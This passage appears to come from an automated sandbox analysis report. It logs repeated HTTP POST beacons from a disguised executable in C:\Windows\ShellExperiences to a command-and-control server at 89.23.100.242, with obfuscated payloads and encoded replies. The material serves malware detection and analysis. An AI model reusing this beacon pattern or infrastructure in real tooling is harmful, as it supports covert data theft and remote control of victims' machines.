                                                                                                Data Ascii: \RCP^VVUX[WVP_[VUT^]TYQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',+Y?1+%$/">-4_<(;"4'U? <*/"B%(\&:'_!/Y.9
                                                                                                Jan 10, 2025 07:58:06.311803102 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:06.463865995 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                37192.168.2.44982389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:06.600534916 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2532
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:06.954659939 CET2532OUTData Raw: 59 53 43 56 5e 5d 56 57 58 5b 57 56 50 5b 5b 53 55 52 5e 59 54 59 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YSCV^]VWX[WVP[[SUR^YTYQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B;"#Z<.+&',\%V?.8\(80";?3+Y*Y"C&=$*'_!/Y.1
                                                                                                Jan 10, 2025 07:58:07.344628096 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                38192.168.2.44983089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:07.474140882 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:07.829819918 CET2544OUTData Raw: 59 51 43 52 5e 5d 56 55 58 5b 57 56 50 5a 5b 52 55 57 5e 5f 54 5f 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCR^]VUX[WVPZ[RUW^_T_QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1/X>."(#8T>>8<$"'#( #=52(X0'_!/Y.-
                                                                                                Jan 10, 2025 07:58:08.327179909 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:08.460572958 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                39192.168.2.44983789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:08.585736990 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                40192.168.2.44984089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:08.805211067 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:09.157881975 CET2036OUTData Raw: 59 56 46 53 5e 56 53 54 58 5b 57 56 50 5c 5b 5a 55 52 5e 59 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVFS^VSTX[WVP\[ZUR^YTPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B,#?-Z<%<Z,:W+?8!8<[+/&@&['3'_!/Y.
                                                                                                Jan 10, 2025 07:58:09.573379040 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:09.706527948 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 52 23 05 30 1c 26 3f 35 52 2d 06 3a 0e 28 30 3b 06 3d 3e 33 5f 29 23 3b 52 3a 01 24 0b 35 38 2d 5c 29 32 3e 56 27 2c 30 1c 26 1d 21 59 0c 13 26 5a 3c 29 2e 0e 29 04 24 5a 2b 31 0c 42 27 1d 2f 59 24 13 2d 50 34 2f 0d 03 2b 04 3a 0a 3c 08 3d 1f 2d 5f 30 15 3d 3c 34 54 27 0c 2a 57 0c 1f 26 56 23 31 3a 0d 20 22 08 12 27 06 34 0e 24 06 20 55 32 01 3b 5b 37 03 3b 12 2d 5f 37 00 21 00 28 5f 3e 58 3a 1f 36 22 27 0d 2b 06 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989R#0&?5R-:(0;=>3_)#;R:$58-\)2>V',0&!Y&Z<).)$Z+1B'/Y$-P4/+:<=-_0=<4T'*W&V#1: "'4$ U2;[7;-_7!(_>X:6"'+ Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                41192.168.2.44984189.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:08.928224087 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:09.283199072 CET2544OUTData Raw: 5c 56 46 57 5e 59 56 52 58 5b 57 56 50 53 5b 52 55 55 5e 58 54 58 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFW^YVRX[WVPS[RUU^XTXQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;18?-:>6$/:R+.<((4Z"$(#3Y)/%2<X0:'_!/Y.
                                                                                                Jan 10, 2025 07:58:09.664468050 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:09.818079948 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                42192.168.2.44984989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:09.941729069 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:10.298403025 CET2544OUTData Raw: 59 5f 43 5e 5e 57 56 54 58 5b 57 56 50 59 5b 51 55 54 5e 5f 54 5a 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_C^^WVTX[WVPY[QUT^_TZQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';!?+-+/899>=8X?;<Y"B8(?_=*2> '*'_!/Y.!
                                                                                                Jan 10, 2025 07:58:10.681381941 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:10.808757067 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                43192.168.2.44985689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:10.962347984 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:11.314213991 CET2544OUTData Raw: 59 50 46 50 5e 5a 53 55 58 5b 57 56 50 5f 5b 51 55 5d 5e 52 54 5d 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPFP^ZSUX[WVP_[QU]^RT]Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',2,(>>(/,*-S?[7?;!$?<3[=@1'':'_!/Y.9
                                                                                                Jan 10, 2025 07:58:11.725784063 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:11.860409021 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                44192.168.2.44986489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:12.015495062 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:12.360898018 CET2544OUTData Raw: 59 50 43 57 5e 5d 56 50 58 5b 57 56 50 5c 5b 50 55 52 5e 5d 54 5d 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPCW^]VPX[WVP\[PUR^]T]QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;"8<=9[? [-)%(8)8$Z!;?3'X+<>A&'$*'_!/Y.
                                                                                                Jan 10, 2025 07:58:12.755327940 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:12.905602932 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                45192.168.2.44987289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:13.037450075 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:13.392235994 CET2544OUTData Raw: 5c 54 46 55 5e 58 56 5f 58 5b 57 56 50 5e 5b 53 55 5c 5e 58 54 51 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TFU^XV_X[WVP^[SU\^XTQQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;>.:(5(Y-::($<88[5$</Y*<6%=?3:'_!/Y.=
                                                                                                Jan 10, 2025 07:58:13.794368982 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:13.946679115 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                46192.168.2.44987989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:14.081201077 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:14.439058065 CET2544OUTData Raw: 59 50 46 54 5e 5a 53 57 58 5b 57 56 50 58 5b 56 55 54 5e 5f 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPFT^ZSWX[WVPX[VUT^_T\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C/1;[(=<&-)!V<-'+;<Z#4'<?)Y%2;3*'_!/Y.%


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                47192.168.2.44988589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:14.732002020 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:15.079663038 CET2036OUTData Raw: 59 55 43 55 5e 5d 56 56 58 5b 57 56 50 5c 5b 56 55 51 5e 52 54 5c 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCU^]VVX[WVP\[VUQ^RT\Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/0+<P?/2<X+;8]"'$(,><*A&>$Y'*'_!/Y.
                                                                                                Jan 10, 2025 07:58:15.476474047 CET374INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 31 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 39 57 23 38 3f 0f 26 2f 07 11 3a 59 3e 0b 3f 33 3c 12 2a 03 37 5a 29 30 3b 56 2d 01 3b 54 20 28 31 5c 2b 21 22 14 27 2c 24 52 25 1d 21 59 0c 13 25 01 3f 2a 0f 56 29 14 0a 5b 29 22 3d 1c 27 20 2b 1d 24 13 0f 18 23 06 2c 5b 3f 39 21 51 3c 08 32 0f 2c 39 3c 16 29 3c 30 1f 30 1c 2a 57 0c 1f 25 0a 23 21 39 57 21 1c 0b 03 30 2b 23 1e 30 06 24 56 26 11 20 01 20 3a 3c 03 2e 5f 3b 00 35 00 23 01 2a 10 2d 0b 22 1c 2c 52 28 2c 20 51 22 0d 22 50 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989W#8?&/:Y>?3<*7Z)0;V-;T (1\+!"',$R%!Y%?*V)[)"=' +$#,[?9!Q<2,9<)<00*W%#!9W!0+#0$V& :<._;5#*-",R(, Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.2.44988689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
